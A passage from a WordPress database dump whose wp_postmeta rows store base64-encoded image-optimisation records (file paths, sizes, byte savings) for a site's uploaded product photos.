L3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy04MDB4NTA3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTU1OSwiaWQiOjk0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTc2OHg0ODcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy03Njh4NDg3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtNzY4eDQ4Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1NjIsImlkIjo5NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0xNjAweDEwMTQuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTAxNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTE2MDB4MTAxNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTE2MDB4MTAxNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1NjYsImlkIjo5NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTY4LCJpZCI6OTQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTU3MSwiaWQiOjk0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1NzMsImlkIjo5NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTc2LCJpZCI6OTQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTc5LCJpZCI6OTQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTgyLCJpZCI6OTQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTg1LCJpZCI6OTQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTg3LCJpZCI6OTQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTkwLCJpZCI6OTQ3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29886, 945, 'wpfc_optimisation_reduction', '2206642'); 
INSERT INTO `wp_postmeta` VALUES (29887, 945, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NDEuanBnIiwicmVkdWN0aW9uIjoyMjA2MjYzLCJ0aW1lIjoxNDgzNTc5NjAzLCJpZCI6Ijk0NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NjA2LCJpZCI6OTQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU0MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTYwOSwiaWQiOjk0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NDEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk2MTIsImlkIjo5NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk2MTYsImlkIjo5NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NjE4LCJpZCI6OTQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU0MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTYyMSwiaWQiOjk0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk2MjMsImlkIjo5NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NjI2LCJpZCI6OTQ1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTQxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMTQsInRpbWUiOjE0ODM1Nzk2MjksImlkIjo5NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NDEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjE1NCwidGltZSI6MTQ4MzU3OTYzMSwiaWQiOjk0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU0MS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTYzNCwiaWQiOjk0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU0MS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTYzNywiaWQiOjk0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU0MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU0MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTYzOSwiaWQiOjk0NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29888, 923, 'wpfc_optimisation_reduction', '26096'); 
INSERT INTO `wp_postmeta` VALUES (29889, 923, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy5qcGciLCJ3aWR0aCI6NTQ3MiwiaGVpZ2h0IjozNjQ4LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc5NjQ0LCJpZCI6IjkyMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMjczLCJ0aW1lIjoxNDgzNTc5NjQ4LCJpZCI6OTIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMD